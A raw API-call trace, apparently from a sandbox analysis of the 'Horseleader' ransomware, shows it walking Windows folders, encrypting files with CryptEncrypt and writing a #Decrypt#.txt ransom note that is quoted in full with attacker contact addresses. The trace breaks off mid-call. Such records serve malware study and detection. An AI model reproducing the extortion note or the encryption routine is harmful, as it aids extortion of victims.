ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="es-ES", cAlternateFileName="")) returned 1 [0230.822] lstrcmpiW (lpString1="es-ES", lpString2="Windows") returned -1 [0230.822] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES") returned 60 [0230.822] lstrcmpW (lpString1="es-ES", lpString2=".") returned 1 [0230.822] lstrcmpW (lpString1="es-ES", lpString2="..") returned 1 [0230.822] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0230.822] GetProcessHeap () returned 0x780000 [0230.822] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0230.822] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*") returned 62 [0230.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0230.823] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0230.823] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\.") returned 62 [0230.823] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0230.824] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0230.824] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0230.824] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\..") returned 63 [0230.824] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0230.824] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0230.824] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe41519b8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe41519b8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0230.824] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0230.824] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui") returned 76 [0230.824] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.824] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.824] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.824] lstrlenW (lpString=".testttjffg") returned 11 [0230.825] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.825] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.825] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.825] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.825] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe41519b8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe41519b8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0230.825] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0230.826] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\#Decrypt#.txt") returned 74 [0230.826] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0230.826] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0230.826] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0230.827] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0230.828] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0230.828] CloseHandle (hObject=0x158) returned 1 [0230.828] GetProcessHeap () returned 0x780000 [0230.828] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0230.828] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="et-EE", cAlternateFileName="")) returned 1 [0230.828] lstrcmpiW (lpString1="et-EE", lpString2="Windows") returned -1 [0230.828] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE") returned 60 [0230.828] lstrcmpW (lpString1="et-EE", lpString2=".") returned 1 [0230.828] lstrcmpW (lpString1="et-EE", lpString2="..") returned 1 [0230.829] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0230.829] GetProcessHeap () returned 0x780000 [0230.829] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0230.829] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*") returned 62 [0230.829] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0231.599] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0231.599] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\.") returned 62 [0231.599] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0231.600] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0231.600] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0231.600] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\..") returned 63 [0231.600] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0231.600] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0231.600] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4e9cfd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeb74b2cd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeb74b2cd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0231.600] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0231.600] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui") returned 76 [0231.600] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0231.600] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0231.600] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0231.600] lstrlenW (lpString=".testttjffg") returned 11 [0231.600] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0231.600] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0231.600] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0231.601] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.601] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4e9cfd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeb74b2cd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeb74b2cd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0231.601] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0231.601] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\#Decrypt#.txt") returned 74 [0231.601] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0231.602] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0231.602] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0231.604] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0231.604] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0231.604] CloseHandle (hObject=0x158) returned 1 [0231.604] GetProcessHeap () returned 0x780000 [0231.604] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0231.604] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0231.604] lstrcmpiW (lpString1="fi-FI", lpString2="Windows") returned -1 [0231.604] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI") returned 60 [0231.604] lstrcmpW (lpString1="fi-FI", lpString2=".") returned 1 [0231.604] lstrcmpW (lpString1="fi-FI", lpString2="..") returned 1 [0231.604] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0231.605] GetProcessHeap () returned 0x780000 [0231.605] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0231.605] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*") returned 62 [0231.605] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0231.605] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0231.605] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\.") returned 62 [0231.605] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0231.605] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0231.605] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0231.605] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\..") returned 63 [0231.605] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0231.606] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0231.606] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47dd5b4, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4a64ce1, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4a64ce1, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0231.606] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0231.606] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui") returned 76 [0231.606] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0231.606] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0231.606] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0231.606] lstrlenW (lpString=".testttjffg") returned 11 [0231.606] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0231.606] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0231.606] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, 